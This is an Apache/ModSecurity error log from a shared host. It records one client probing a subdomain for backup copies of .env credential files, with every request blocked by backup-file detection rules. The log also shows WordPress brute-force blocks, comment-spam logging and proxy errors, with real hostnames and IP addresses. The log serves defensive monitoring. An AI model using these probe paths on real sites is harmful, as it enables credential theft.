[Tue May 26 14:29:23.650179 2026] [security2:error] [pid 610693:tid 610860] [client 208.84.100.165:38340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVg6zvNO3hpmlY6M8RrMAAAACU"]
[Tue May 26 14:29:23.746329 2026] [proxy:error] [pid 610693:tid 610916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.746395 2026] [proxy_http:error] [pid 610693:tid 610916] [client 208.84.100.165:38372] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747022 2026] [proxy:error] [pid 610693:tid 610916] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747055 2026] [proxy_http:error] [pid 610693:tid 610916] [client 208.84.100.165:38372] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747249 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747300 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38388] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:23.747908 2026] [proxy:error] [pid 610693:tid 610886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:23.747940 2026] [proxy_http:error] [pid 610693:tid 610886] [client 208.84.100.165:38388] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:24.273343 2026] [security2:error] [pid 606909:tid 607133] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg610yRtX9qA7aVUVwPQAAAOM"]
[Tue May 26 14:29:24.542294 2026] [security2:error] [pid 606909:tid 606938] [remote 167.71.130.119:58072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVg7F0yRtX9qA7aVUVwSAAAkxw"]
[Tue May 26 14:29:24.840333 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.050762 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.050814 2026] [security2:error] [pid 610693:tid 610919] [client 1.20.206.162:60727] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7DvNO3hpmlY6M8RrRgAAAGA"]
[Tue May 26 14:29:25.250134 2026] [security2:error] [pid 610693:tid 610894] [client 208.84.100.165:22268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVg7TvNO3hpmlY6M8RrUQAAAEc"]
[Tue May 26 14:29:25.257865 2026] [proxy:error] [pid 610693:tid 610825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.257916 2026] [proxy_http:error] [pid 610693:tid 610825] [client 208.84.100.165:38340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.259769 2026] [proxy:error] [pid 610693:tid 610825] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.259827 2026] [proxy_http:error] [pid 610693:tid 610825] [client 208.84.100.165:38340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.260719 2026] [proxy:error] [pid 606909:tid 607079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.260763 2026] [proxy_http:error] [pid 606909:tid 607079] [client 208.84.100.165:22272] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.261156 2026] [security2:error] [pid 606909:tid 607145] [client 208.84.100.165:22182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVg7V0yRtX9qA7aVUVwUgAAAO8"]
[Tue May 26 14:29:25.261796 2026] [proxy:error] [pid 606909:tid 607079] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.261820 2026] [security2:error] [pid 606909:tid 607157] [client 208.84.100.165:22136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVg7V0yRtX9qA7aVUVwUwAAAPs"]
[Tue May 26 14:29:25.261830 2026] [proxy_http:error] [pid 606909:tid 607079] [client 208.84.100.165:22272] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.261841 2026] [security2:error] [pid 610693:tid 610906] [client 208.84.100.165:22158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVg7TvNO3hpmlY6M8RrUwAAAFM"]
[Tue May 26 14:29:25.262035 2026] [security2:error] [pid 610693:tid 610910] [client 208.84.100.165:22152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVg7TvNO3hpmlY6M8RrVQAAAFc"]
[Tue May 26 14:29:25.262181 2026] [security2:error] [pid 610693:tid 610858] [client 208.84.100.165:22114] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVg7TvNO3hpmlY6M8RrVwAAACM"]
[Tue May 26 14:29:25.262418 2026] [proxy:error] [pid 606909:tid 607074] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.262469 2026] [proxy_http:error] [pid 606909:tid 607074] [client 208.84.100.165:22090] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.262718 2026] [proxy:error] [pid 610693:tid 610843] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.262761 2026] [proxy_http:error] [pid 610693:tid 610843] [client 208.84.100.165:22126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.262868 2026] [security2:error] [pid 610693:tid 610839] [client 208.84.100.165:22170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrVAAAABA"]
[Tue May 26 14:29:25.263137 2026] [security2:error] [pid 610693:tid 610847] [client 208.84.100.165:22102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVg7TvNO3hpmlY6M8RrWAAAABg"]
[Tue May 26 14:29:25.263281 2026] [security2:error] [pid 610693:tid 610943] [client 208.84.100.165:22092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrWgAAAHg"]
[Tue May 26 14:29:25.263316 2026] [proxy:error] [pid 610693:tid 610843] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263350 2026] [proxy_http:error] [pid 610693:tid 610843] [client 208.84.100.165:22126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.263492 2026] [proxy:error] [pid 606909:tid 607074] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263551 2026] [proxy:error] [pid 610693:tid 610926] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.263547 2026] [proxy_http:error] [pid 606909:tid 607074] [client 208.84.100.165:22090] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.263592 2026] [proxy_http:error] [pid 610693:tid 610926] [client 208.84.100.165:22086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.264223 2026] [proxy:error] [pid 610693:tid 610926] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.264262 2026] [proxy_http:error] [pid 610693:tid 610926] [client 208.84.100.165:22086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.265272 2026] [proxy:error] [pid 606909:tid 607144] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.265315 2026] [proxy_http:error] [pid 606909:tid 607144] [client 208.84.100.165:22058] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.265928 2026] [proxy:error] [pid 606909:tid 607144] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.265963 2026] [proxy_http:error] [pid 606909:tid 607144] [client 208.84.100.165:22058] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.270124 2026] [security2:error] [pid 606909:tid 607112] [client 208.84.100.165:22298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVg7V0yRtX9qA7aVUVwVgAAAM4"]
[Tue May 26 14:29:25.270598 2026] [security2:error] [pid 610693:tid 610832] [client 208.84.100.165:22288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVg7TvNO3hpmlY6M8RrXAAAAAk"]
[Tue May 26 14:29:25.270599 2026] [security2:error] [pid 610693:tid 610934] [client 208.84.100.165:22312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrWwAAAG8"]
[Tue May 26 14:29:25.447310 2026] [security2:error] [pid 606909:tid 607040] [client 208.84.100.165:22262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVg7V0yRtX9qA7aVUVwVwAAAIY"]
[Tue May 26 14:29:25.447407 2026] [security2:error] [pid 606909:tid 607147] [client 208.84.100.165:22214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVg7V0yRtX9qA7aVUVwWQAAAPE"]
[Tue May 26 14:29:25.447418 2026] [security2:error] [pid 610693:tid 610924] [client 208.84.100.165:22246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVg7TvNO3hpmlY6M8RrXgAAAGU"]
[Tue May 26 14:29:25.447426 2026] [security2:error] [pid 610693:tid 610893] [client 208.84.100.165:22222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVg7TvNO3hpmlY6M8RrYAAAAEY"]
[Tue May 26 14:29:25.447729 2026] [security2:error] [pid 610693:tid 610925] [client 208.84.100.165:22234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrXQAAAGY"]
[Tue May 26 14:29:25.447881 2026] [proxy:error] [pid 610693:tid 610882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.447932 2026] [proxy_http:error] [pid 610693:tid 610882] [client 208.84.100.165:22202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:25.448077 2026] [security2:error] [pid 610693:tid 610949] [client 208.84.100.165:22314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVg7TvNO3hpmlY6M8RrYQAAAH4"]
[Tue May 26 14:29:25.448299 2026] [security2:error] [pid 606909:tid 607044] [client 208.84.100.165:22190] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVg7V0yRtX9qA7aVUVwWgAAAIo"]
[Tue May 26 14:29:25.448373 2026] [security2:error] [pid 606909:tid 607159] [client 208.84.100.165:22238] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.anujoverseas.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVg7V0yRtX9qA7aVUVwWAAAAP0"]
[Tue May 26 14:29:25.448488 2026] [proxy:error] [pid 610693:tid 610882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:25.448519 2026] [proxy_http:error] [pid 610693:tid 610882] [client 208.84.100.165:22202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.355537 2026] [security2:error] [pid 610693:tid 610823] [client 1.20.206.162:33456] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrcwAAAAA"]
[Tue May 26 14:29:26.363154 2026] [proxy:error] [pid 606909:tid 607110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:26.363232 2026] [proxy_http:error] [pid 606909:tid 607110] [client 208.84.100.165:22298] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.363916 2026] [proxy:error] [pid 606909:tid 607110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:29:26.363959 2026] [proxy_http:error] [pid 606909:tid 607110] [client 208.84.100.165:22298] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:29:26.402654 2026] [security2:error] [pid 610693:tid 610823] [client 1.20.206.162:33456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrcwAAAAA"]
[Tue May 26 14:29:26.936042 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:19834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrgAAAAH0"]
[Tue May 26 14:29:26.936193 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:19834] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVg7jvNO3hpmlY6M8RrgAAAAH0"]
[Tue May 26 14:29:27.988667 2026] [security2:error] [pid 610693:tid 610893] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg7zvNO3hpmlY6M8RrjgAAAEY"]
[Tue May 26 14:29:28.452376 2026] [security2:error] [pid 606909:tid 607111] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8F0yRtX9qA7aVUVwcQAAAM0"]
[Tue May 26 14:29:28.624321 2026] [security2:error] [pid 610693:tid 610832] [client 1.20.206.162:34200] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8DvNO3hpmlY6M8RroQAAAAk"]
[Tue May 26 14:29:28.666181 2026] [security2:error] [pid 610693:tid 610832] [client 1.20.206.162:34200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8DvNO3hpmlY6M8RroQAAAAk"]
[Tue May 26 14:29:30.124845 2026] [security2:error] [pid 610693:tid 610827] [client 1.20.206.162:35322] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrxAAAAAQ"]
[Tue May 26 14:29:30.169591 2026] [security2:error] [pid 610693:tid 610827] [client 1.20.206.162:35322] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrxAAAAAQ"]
[Tue May 26 14:29:30.639009 2026] [security2:error] [pid 610693:tid 610894] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8jvNO3hpmlY6M8RrygAAAEc"]
[Tue May 26 14:29:31.617230 2026] [security2:error] [pid 606909:tid 607124] [client 1.20.206.162:36133] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg810yRtX9qA7aVUVwigAAANo"]
[Tue May 26 14:29:31.657254 2026] [security2:error] [pid 606909:tid 607124] [client 1.20.206.162:36133] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg810yRtX9qA7aVUVwigAAANo"]
[Tue May 26 14:29:32.156765 2026] [security2:error] [pid 610693:tid 610830] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVg8zvNO3hpmlY6M8Rr6wAAAAc"]
[Tue May 26 14:29:33.124863 2026] [security2:error] [pid 610693:tid 610876] [client 1.20.206.162:36878] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "anujtradingco.com"] [uri "/wp-comments-post.php"] [unique_id "ahVg9TvNO3hpmlY6M8Rr_wAAADU"]
